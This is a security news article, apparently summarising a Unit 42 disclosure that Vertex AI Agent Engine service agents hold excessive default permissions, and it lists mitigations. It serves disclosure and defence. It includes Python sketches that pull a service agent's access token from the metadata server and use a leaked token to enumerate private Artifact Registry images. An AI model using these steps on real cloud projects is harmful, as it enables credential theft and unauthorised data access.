Vertex AI Vulnerability: How "Double Agents" Can Expose Google Cloud Data and Private Artifacts
TL;DR
Researchers from Palo Alto Networks Unit 42 have uncovered a critical security "blind spot" in Google Cloud’s Vertex AI platform. Due to excessive default permissions in the platform's service agent model, attackers could weaponize AI agents to exfiltrate sensitive data, access restricted Google-owned repositories, and compromise cloud environments.
A new disclosure from cybersecurity researchers has highlighted a significant risk in the rapidly evolving world of AI deployment. According to a report by Palo Alto Networks Unit 42, a vulnerability in Google Cloud's Vertex AI platform could allow AI agents to be turned into "double agents," secretly compromising the very organizations they were designed to serve.
The issue stems from the Vertex AI permission model, specifically the Per-Product, Per-Project Service Agent (P4SA) used when agents built with the Agent Development Kit (ADK) are deployed to the Vertex AI Agent Engine.
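For context, such an agent is typically defined with the Python ADK and then pushed to the Agent Engine. Below is a minimal sketch of what an ADK agent definition can look like; the agent name, model identifier, and instruction are illustrative assumptions, not details from the report.

```python
# Minimal ADK agent sketch (illustrative; names and model are assumptions).
# Requires the google-adk package: pip install google-adk
from google.adk.agents import Agent

# Once deployed to the Vertex AI Agent Engine, code serving this agent
# runs under the project's P4SA service agent identity.
root_agent = Agent(
    name="support_assistant",            # hypothetical agent name
    model="gemini-2.0-flash",            # assumed model identifier
    description="Answers customer support questions.",
    instruction="Answer user questions briefly and accurately.",
)
```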
The Mechanics of the "Double Agent"
The vulnerability centers on the excessive permission scope granted by default to these service agents. When an AI agent is deployed on the Vertex AI Agent Engine, the environment that handles calls to that agent can reach Google's metadata service.
Unit 42 researchers discovered that this process exposes the credentials of the service agent. These credentials contain highly sensitive information, including:
- The Google Cloud Platform (GCP) project hosting the agent.
- The identity of the AI agent.
- The OAuth scopes of the host machine.
By extracting these credentials, an attacker can jump from the AI agent's limited execution context directly into the customer’s broader GCP project.
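To make the mechanics concrete, here is a minimal sketch, not the researchers' exploit, of how code running in an agent's execution environment can read the attached service agent's identity, scopes, and access token from the standard Google Cloud metadata endpoints:

```python
# Sketch: reading the attached service account's details from inside the
# agent's runtime via the standard metadata endpoints (illustrative only).
import requests

METADATA = "http://metadata.google.internal/computeMetadata/v1"
HEADERS = {"Metadata-Flavor": "Google"}

# GCP project hosting the runtime.
project = requests.get(f"{METADATA}/project/project-id", headers=HEADERS).text

# Identity (email) and OAuth scopes of the attached service agent.
email = requests.get(
    f"{METADATA}/instance/service-accounts/default/email", headers=HEADERS
).text
scopes = requests.get(
    f"{METADATA}/instance/service-accounts/default/scopes", headers=HEADERS
).text

# Short-lived OAuth 2.0 access token for that service agent.
token = requests.get(
    f"{METADATA}/instance/service-accounts/default/token", headers=HEADERS
).json()["access_token"]

print(project, email, scopes, token[:12] + "...")
```

Whoever obtains that token can then authenticate to Google Cloud APIs as the service agent itself.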
Unrestricted Access to Cloud Data
The impact of this credential theft is severe. Researchers demonstrated that the stolen P4SA credentials effectively undermined isolation guarantees. In testing, they were able to gain unrestricted read access to all data stored within Google Cloud Storage buckets associated with that project.
"This level of access constitutes a significant security risk, transforming the AI agent from a helpful tool into a potential insider threat," Unit 42 noted in their report.
Exposure of Google’s Internal Infrastructure
The reach of the vulnerability extended beyond customer data. Because the Agent Engine runs within a Google-managed tenant project, the extracted credentials also provided visibility into Google's own tenant buckets.
While the credentials lacked the specific permissions to read the data within those tenant buckets, they did grant access to restricted, Google-owned Artifact Registry repositories.
Researchers were able to:
- Download container images from private repositories that form the core of the Vertex AI Reasoning Engine.
- Access several other restricted images not explicitly listed in deployment logs.
- Gain a "blueprint" of Google's proprietary code and internal software supply chain.
By mapping these internal systems, an attacker could potentially identify deprecated or vulnerable images to plan more sophisticated secondary attacks.
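To illustrate how such reconnaissance could look, here is a hedged sketch using the public Artifact Registry client library with a stolen token; the project, location, and repository names are placeholders, not the Google-owned paths probed by the researchers.

```python
# Sketch: enumerating Artifact Registry repositories and container images
# with a leaked access token. All identifiers below are placeholders.
from google.cloud import artifactregistry_v1
from google.oauth2.credentials import Credentials

creds = Credentials(token="LEAKED_ACCESS_TOKEN")
client = artifactregistry_v1.ArtifactRegistryClient(credentials=creds)

# Repositories visible to the stolen identity in one location.
parent = "projects/example-tenant-project/locations/us-central1"
for repo in client.list_repositories(parent=parent):
    print("repository:", repo.name)

    # Container images inside each repository.
    for image in client.list_docker_images(parent=repo.name):
        print("  image:", image.uri)
```

Pulling an image is then a matter of authenticating a standard docker pull against the repository host (Artifact Registry accepts an OAuth access token with the oauth2accesstoken username), which is how a downloaded image becomes a blueprint of the code it packages.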
Google's Response and Recommendations
In response to these findings, Google has updated its official documentation to clarify how Vertex AI utilizes resources, accounts, and agents.
To mitigate these risks, Google and Unit 42 recommend the following security measures:
- Use Bring Your Own Service Account (BYOSA): Replace default service agents with custom-configured accounts to avoid excessive default permissions (see the sketch after this list).
- Enforce the Principle of Least Privilege (PoLP): Ensure that AI agents are granted only the minimum permissions necessary to function.
- Restrict OAuth Scopes: Limit the reach of tokens used by the agent engine.
- Rigorous Validation: Treat AI agent deployments with the same security scrutiny as new production code, including source integrity reviews and controlled security testing.
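As one concrete example of the BYOSA and least-privilege advice, the sketch below grants a dedicated agent service account a single, narrow role on the project instead of relying on broad defaults. The project ID, service account, and chosen role are assumptions; the right minimal role depends on what the agent actually needs.

```python
# Sketch: binding one narrow role to a dedicated agent service account
# (read-modify-write of the project IAM policy). Identifiers are placeholders.
from googleapiclient import discovery

PROJECT_ID = "example-project-id"
AGENT_SA = "serviceAccount:agent-runtime@example-project-id.iam.gserviceaccount.com"
MINIMAL_ROLE = "roles/aiplatform.user"   # assumed; pick the narrowest role that works

crm = discovery.build("cloudresourcemanager", "v1")

policy = crm.projects().getIamPolicy(resource=PROJECT_ID, body={}).execute()
policy.setdefault("bindings", []).append(
    {"role": MINIMAL_ROLE, "members": [AGENT_SA]}
)
crm.projects().setIamPolicy(
    resource=PROJECT_ID, body={"policy": policy}
).execute()
```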
"Granting agents broad permissions by default violates the principle of least privilege and is a dangerous security flaw by design," said Ofir Shaty, Unit 42 researcher.
Source
The Hacker News: Vertex AI Vulnerability Exposes Google Cloud Data and Private Artifacts


